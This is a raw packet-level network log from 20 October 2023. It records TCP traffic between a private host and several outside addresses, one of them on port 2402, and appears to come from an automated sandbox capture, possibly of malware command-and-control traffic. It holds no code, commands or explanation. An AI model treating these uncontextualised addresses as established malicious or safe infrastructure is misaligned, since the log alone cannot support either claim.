                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.779524088 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.779623032 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.779670954 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.779757977 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.779850960 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.779885054 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.779901028 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.779985905 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.780122042 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.780163050 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.780179977 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.780235052 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.780266047 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.780288935 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.780343056 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.780391932 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.780519962 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.780535936 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.780536890 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.780550957 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.780586004 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.780606985 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.780709982 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.780725002 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.780733109 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.780868053 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.780888081 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.780917883 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.780991077 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.781064987 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.781125069 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.781145096 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.781183004 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.781222105 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.781320095 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.781368971 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.781389952 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.781430006 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.781548023 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.781687021 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.781734943 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.781805038 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.781855106 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.781898022 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.781936884 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.781975985 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.782078981 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.782088995 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.782196999 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.782248974 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.782327890 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.782443047 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.782588005 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.782933950 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.783054113 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.783122063 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.783180952 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.783265114 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.783279896 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.783361912 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.783458948 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:14.348738909 CEST500312402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:14.661564112 CEST24025003194.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:14.661792040 CEST500312402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:14.663508892 CEST500312402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:15.018748045 CEST24025003194.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:15.021861076 CEST500312402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:15.333946943 CEST24025003194.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:15.338721037 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:15.377480030 CEST500312402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:15.582103014 CEST5003380192.168.11.20178.237.33.50
                                                                                                                                                                                                                        Oct 20, 2023 17:44:15.651405096 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:15.651619911 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:15.652167082 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:15.900590897 CEST8050033178.237.33.50192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:15.900794983 CEST5003380192.168.11.20178.237.33.50
                                                                                                                                                                                                                        Oct 20, 2023 17:44:15.900979042 CEST5003380192.168.11.20178.237.33.50
                                                                                                                                                                                                                        Oct 20, 2023 17:44:15.968843937 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:15.968923092 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:15.968982935 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:15.969037056 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:15.969113111 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:15.969275951 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.230171919 CEST8050033178.237.33.50192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.230350971 CEST5003380192.168.11.20178.237.33.50
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.282541990 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.282974958 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.283068895 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.283169985 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.283195019 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.283353090 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.283368111 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.283441067 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.283451080 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.283468008 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.283603907 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.283787012 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.290158033 CEST500312402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.595896959 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.595988989 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.596111059 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.596179008 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.596249104 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.596256018 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.596358061 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.596421957 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.596437931 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.596529961 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.596563101 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.596627951 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.596702099 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.596733093 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.596803904 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.596862078 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.596887112 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.596976042 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.597039938 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.597083092 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.597119093 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.597204924 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.597239971 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.597461939 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.653721094 CEST24025003194.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.909663916 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.909743071 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.909801960 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.909856081 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.909909964 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.909965038 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.910020113 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.910031080 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.910118103 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.910178900 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.910182953 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.910262108 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.910320044 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.910336971 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.910403967 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.910465956 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.910490990 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.910648108 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.910662889 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.910803080 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.910896063 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.910953999 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.911006927 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.911061049 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.911113977 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.911168098 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.911181927 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.911251068 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.911325932 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.911396027 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.911453962 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.911510944 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.911542892 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.911590099 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.911653996 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.911711931 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.911711931 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.911788940 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.911804914 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.911871910 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.911931038 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.911984921 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.911988974 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.912102938 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.912126064 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:16.912327051 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.223043919 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.223059893 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.223072052 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.223177910 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.223262072 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.223285913 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.223318100 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.223424911 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.223706961 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.223848104 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.223902941 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.223994970 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.224096060 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.224133968 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.224250078 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.224298954 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.224410057 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.224417925 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.224473000 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.224522114 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.224621058 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.224720001 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.224734068 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.224752903 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.224870920 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.224929094 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.225070953 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.225222111 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.225311041 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.225461960 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.225475073 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.225729942 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.225744009 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.225774050 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.225871086 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.225889921 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.225903034 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.225914001 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.226062059 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.226080894 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.226244926 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.226263046 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.226401091 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.226421118 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.226491928 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.226527929 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.226630926 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.226643085 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.226696014 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.226744890 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.226795912 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.226852894 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.226871014 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.226994038 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.227020979 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.227052927 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.227124929 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.227157116 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.227257013 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.227267981 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.227308989 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.227366924 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.227372885 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.227452040 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.227499962 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.227514982 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.227555990 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.227566957 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.227602959 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.227710009 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.227741003 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.227758884 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.227796078 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.227899075 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.227910995 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.227957010 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.227993965 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.228066921 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.228087902 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.228162050 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.228173018 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.228292942 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.228307009 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.228318930 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.228329897 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.228411913 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.228463888 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.228516102 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.228615999 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.228724003 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.228785038 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.228867054 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.228921890 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.229062080 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.229110956 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.229765892 CEST8050033178.237.33.50192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.229917049 CEST5003380192.168.11.20178.237.33.50
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.536324978 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.536403894 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.536458969 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.536518097 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.536571980 CEST24025003294.156.6.253192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.536588907 CEST500322402192.168.11.2094.156.6.253
                                                                                                                                                                                                                        Oct 20, 2023 17:44:17.536672115 CEST500322402192.168.11.2094.156.6.253
